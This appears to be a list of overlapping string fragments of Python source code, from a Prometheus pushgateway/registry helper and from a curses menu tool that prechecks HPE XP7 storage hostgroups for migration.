"= Pushgateway(aa) dal.init_aa(service_name) pushgateways[service] = dal.client else: raise ValueError(\"Service '\" + service +",
"pushgateway_services: m = service_name_pattern.match(service) if m is not None: components = m.groupdict() service_name",
"'pushgateway': from ..api.pushgateway import Pushgateway dal = Pushgateway(aa) dal.init_aa(service_name) pushgateways[service] = dal.client else:",
"\"' is not a valid Pushgateway.\") else: raise ValueError(\"Service '\" + service +",
"m = api_vendor_pattern.match(conn_str) if m is not None: components = m.groupdict() if components['vendor']",
"+ r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', ''))))",
"a valid Pushgateway.\") else: raise ValueError(\"Service '\" + service + \"' not found.\")",
"not a valid Pushgateway.\") else: raise ValueError(\"Service '\" + service + \"' not",
"from ..api.pushgateway import Pushgateway dal = Pushgateway(aa) dal.init_aa(service_name) pushgateways[service] = dal.client else: raise",
"import os import re from prometheus_client.core import CollectorRegistry from prometheus_client.multiprocess import MultiProcessCollector collector_registries",
"re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES',",
"in collector_registries.keys(): collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir is not None: MultiProcessCollector(collector_registries[name]) return collector_registries[name]",
"'\" + service + \"' not found.\") return pushgateways def get_registry(name): if name",
"CollectorRegistry from prometheus_client.multiprocess import MultiProcessCollector collector_registries = {} prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa,",
"= list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in pushgateway_services: m = service_name_pattern.match(service) if",
"os import re from prometheus_client.core import CollectorRegistry from prometheus_client.multiprocess import MultiProcessCollector collector_registries =",
"valid Pushgateway.\") else: raise ValueError(\"Service '\" + service + \"' not found.\") return",
"+ \"' not found.\") return pushgateways def get_registry(name): if name not in collector_registries.keys():",
"apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if m is not None: components = m.groupdict() if",
"re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in pushgateway_services: m =",
"service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)',",
"re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service",
"m is not None: components = m.groupdict() service_name = components['name'] if service_name in",
"api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in",
"..api.pushgateway import Pushgateway dal = Pushgateway(aa) dal.init_aa(service_name) pushgateways[service] = dal.client else: raise ValueError(\"Service",
"= dal.client else: raise ValueError(\"Service '\" + service + \"' is not a",
"get_registry(name): if name not in collector_registries.keys(): collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir is not",
"= re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X)",
"CollectorRegistry() if prometheus_multiproc_dir is not None: MultiProcessCollector(collector_registries[name]) return collector_registries[name] def register_collector(name, collector): job_registry",
"= components['name'] if service_name in apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if",
"+ re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services = list(filter(None, re.split(r'\\s*,\\s*',",
"not in collector_registries.keys(): collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir is not None: MultiProcessCollector(collector_registries[name]) return",
"job_registry = get_registry(name) job_registry.register(collector) def unregister_collector(name, collector): if name in collector_registries.keys(): collector_registries[name].unregister(collector) del",
"list(filter(None, re.split(r'\\s*,\\s*', os.getenv('PUSHGATEWAY_SERVICES', '')))) for service in pushgateway_services: m = service_name_pattern.match(service) if m",
"'')))) for service in pushgateway_services: m = service_name_pattern.match(service) if m is not None:",
"not None: MultiProcessCollector(collector_registries[name]) return collector_registries[name] def register_collector(name, collector): job_registry = get_registry(name) job_registry.register(collector) def",
"conn_str = apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if m is not None: components =",
"apialchemy_prefix, apialchemy_binds = apialchemy_info service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$',",
"re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\\w+)(?:\\+(?:http|https))?)(?=://)', re.X) pushgateway_services",
"prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa, apialchemy_info): pushgateways = {} apialchemy_prefix, apialchemy_binds = apialchemy_info",
"register_collector(name, collector): job_registry = get_registry(name) job_registry.register(collector) def unregister_collector(name, collector): if name in collector_registries.keys():",
"'\" + service + \"' is not a valid Pushgateway.\") else: raise ValueError(\"Service",
"components['name'] if service_name in apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name] m = api_vendor_pattern.match(conn_str) if m",
"collector_registries = {} prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir') def get_pushgateways(aa, apialchemy_info): pushgateways = {} apialchemy_prefix,",
"= {} apialchemy_prefix, apialchemy_binds = apialchemy_info service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix)",
"apialchemy_info service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X) api_vendor_pattern =",
"m.groupdict() service_name = components['name'] if service_name in apialchemy_binds.keys(): conn_str = apialchemy_binds[service_name] m =",
"pushgateways def get_registry(name): if name not in collector_registries.keys(): collector_registries[name] = CollectorRegistry() if prometheus_multiproc_dir",
"+ service + \"' not found.\") return pushgateways def get_registry(name): if name not"
] |
[] |
[
"string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups by box ###",
"if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start =",
"def get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width =",
"len(self.filtered_items) - 1: ### slide slice down ### self.slice_end += n if self.slice_end",
"except: log_size = 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try:",
"log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions",
"self.heigth,self.width = self.window.getmaxyx() self.title = title self.selection = [] def display(self): self.window.clear() line",
"len(item) >= self.width: item = item[:self.width-1] if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL)",
"os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start",
"return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title",
"key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ###",
"added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short to",
"hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host (hba_wwn) ###",
"### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter",
"self.position += n if self.position < 0: self.position = 0 elif self.position >=",
"< len(self.display_list) - 1: self.slice_end += n if self.slice_end > len(self.display_list) - 1:",
"sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box {} :\".format(box_name)) logger.info(box_dict[box_name]) #####################",
"in the window ### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start",
"import re import logging import logging.handlers import copy from ConfigParser import ConfigParser import",
"= serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr in",
"= logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG",
"self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end",
"[curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]}",
"exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in site_dict: site = site_dict[box_name]",
"hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we",
"(\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1)",
"{} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short to be valid, skipping {}\".format(row)) ###",
"serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]:",
"curses from curses import panel import re import logging import logging.handlers import copy",
"Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start =",
"sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo",
"{}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line) >= self.width: line = line[:self.width-1]",
"self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to display ### self.slice_start = 0 self.slice_len",
"logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box",
"DESCRIPTION : Precheck to examine hostgroup is ready for migration AUTHOR : <NAME>",
"self.consistent = consistent self.map_dir = map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def",
"& wait ### stdscr.refresh() stdscr.getkey() #################### ### parse config ### #################### configfile =",
"int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()]",
"panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def navigate(self,n): if n < 0: if",
"hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ### xpinfo_menu =",
"file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader:",
"new search criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items to",
"= {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups()",
"Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read",
"err_msg = \"No serial nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg +",
"configfile = \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not",
"%(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration",
"update the list of xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list =",
"index,item in enumerate(self.display_list): if len(item) >= self.width: item = item[:self.width-1] if self.slice_start <=",
"from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to",
"line = \"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line) >= self.width: line =",
"Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ### stdscr.refresh() stdscr.getkey() #################### ### parse config",
"xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr))",
"on previous ODR framework 1.0 Initial version 1.1 Curses menu structure added 1.2",
"[curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) - 1: break else: self.items[self.position][1]() elif key ==",
"search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start +",
"curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after we received the response ###",
"< 2 and self.slice_start >= 1: ### slide slice up ### self.slice_start +=",
"### #################### configfile = \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"):",
"import os import os.path import csv import string import xp7 #################################################################################################### ### VARIABLES",
"= curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item[0]) line =",
"#key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B>",
"### select hostgroups by box ### for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict = {}",
"= self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) - 1: break",
"in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for",
"elif self.position >= len(self.items): self.position = len(self.items) - 1 def display(self): self.panel.top() self.panel.show()",
"self.position = len(self.items) - 1 def display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh()",
"0 self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if self.position <",
"box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name not",
"self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary = [] self.window.keypad(1) self.panel = panel.new_panel(self.window)",
"curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title",
"enumerate(self.items): if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL #",
"logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {}",
"= curses.A_NORMAL # line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line) >=",
"if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if",
"self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len elif n > 0: if",
"exiting ..\\n\") sys.exit(1) ### define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO",
"title self.search_str = \"\" def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line)",
"main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host (hba_wwn) ### select_item_dict = {}",
"daemon to pairdisplay & check on status #################################################################################################### \"\"\" import curses from curses",
"0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh()",
"down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear()",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] self.consistent = consistent def",
"on the items which fits in the window ### self.slice_start = 0 self.slice_len",
"= self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position",
"self.selection = list(sorted(current_set)) self.display() def clear(self): del self.selection[:] self.display() def get(self): return self.selection",
"def navigate(self,n): self.position += n if self.position < 0: self.position = 0 elif",
"ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent self.map_dir = map_dir self.window.keypad(1)",
"HPE XP7 Migration, Precheck DESCRIPTION : Precheck to examine hostgroup is ready for",
"< len(self.xpinfo_file_list) - 1: ### slide slice down ### self.slice_end += n if",
"> 8: hostname = row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr =",
"def update(self): \"\"\" update the selection items list to match the new search",
"#curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD)",
"hostgroups to the selection ### for box_name in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]:",
"file\",xpinfo_menu.display)) ### show hostgroup summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display))",
"### for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict = {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list",
"self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if n < 0: if",
"host (hba_wwn) ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in",
"the selection ### for box_name in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing:",
"0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice",
"\"\\n\") sys.exit(1) if box_name in site_dict: site = site_dict[box_name] else: err_msg = \"No",
"+= n if self.position < 0: self.position = 0 elif self.position >= len(self.items):",
"if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update items to match search all\") self.filtered_items =",
"slice ### if n < 0: if self.position - self.slice_start < 2 and",
"def get(self): return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width =",
"self.slice_len elif n > 0: if self.slice_end < len(self.display_list) - 1: self.slice_end +=",
"0 self.xpinfo_dir = xpinfo_dir self.selection = selection def update(self): \"\"\" update the list",
"curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr): ### clear screen ### stdscr.clear() ###",
"= {}, n = {}\".format(self.position,n )) ### adjust slice ### if n <",
"in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1:",
"### show hostgroup summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ###",
"process the selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\")",
"n if self.position < 0: self.position = 0 elif self.position >= len(self.items): self.position",
"curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel",
"def update(self): \"\"\" update the list of xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir):",
"= selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] self.consistent =",
"config ### #################### configfile = \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for mandatory_section in",
"+= n if self.slice_end > len(self.display_list) - 1: self.slice_end = len(self.display_list) - 1",
"hostgroups by host (hba_wwn) ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for",
"os.path import csv import string import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen =",
"mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item) line",
"line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1] ### only add",
"of xpinfo files ### for index,item in enumerate(self.xpinfo_file_list): if index == self.position: mode",
"menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify",
"= upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}: \".format(self.text) if line",
"if len(item) >= self.width: item = item[:self.width-1] if self.slice_start <= index <= self.slice_end:",
"### adjust slice ### if n < 0: if self.position - self.slice_start <",
"hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear",
"### after we received the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate()",
"[curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif",
"by box ### for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict = {} for box_name in",
"(hba_wwn) ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]:",
"sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr):",
"= os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg = \"No",
"dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir",
"key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate()",
"< 2 and self.slice_end < len(self.filtered_items) - 1: ### slide slice down ###",
"and daemon to pairdisplay & check on status #################################################################################################### \"\"\" import curses from",
"= int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for name,value in cfg.items(\"site\"):",
"[] def navigate(self,n): if n < 0: if self.slice_start >= 1: self.slice_start +=",
"only add lines in the slice ### if self.slice_start <= index <= self.slice_end:",
"define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = [] input_search =",
"in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()] = value for",
"self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if len(item) >= self.width: item = item[:self.width-1]",
"& check on status #################################################################################################### \"\"\" import curses from curses import panel import",
"= 0 elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate ::",
"row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV {}",
"self.slice_start + self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.selection",
"for the consistent HOSTGROUPs ? (Y/n)\") key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]:",
"self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ### show the list",
"box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr",
"if self.position == len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set",
"curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object):",
"{}\".format(self.title,self.search_str) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def",
"we received the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object):",
"os import os.path import csv import string import xp7 #################################################################################################### ### VARIABLES ####################################################################################################",
"xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu",
"= item[:self.width-1] if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if",
"window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text",
"self.heigth - 6) self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position =",
"for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7",
"hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if",
"### self.slice_end += n if self.slice_end > len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items)",
"in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key",
"clear screen ### stdscr.clear() ### check window heigth and width ### if curses.COLS",
"set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self): del self.selection[:] self.display() def get(self):",
"= value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in cfg.items(\"instance\"):",
"item[:self.width-1] if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key",
"True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if index == self.position: mode",
"dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr]",
"def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.consistent =",
"box_name ##################### ### start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\")",
"self.position = 0 elif self.position >= len(self.items): self.position = len(self.items) - 1 def",
"if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP: self.navigate(-1) elif key ==",
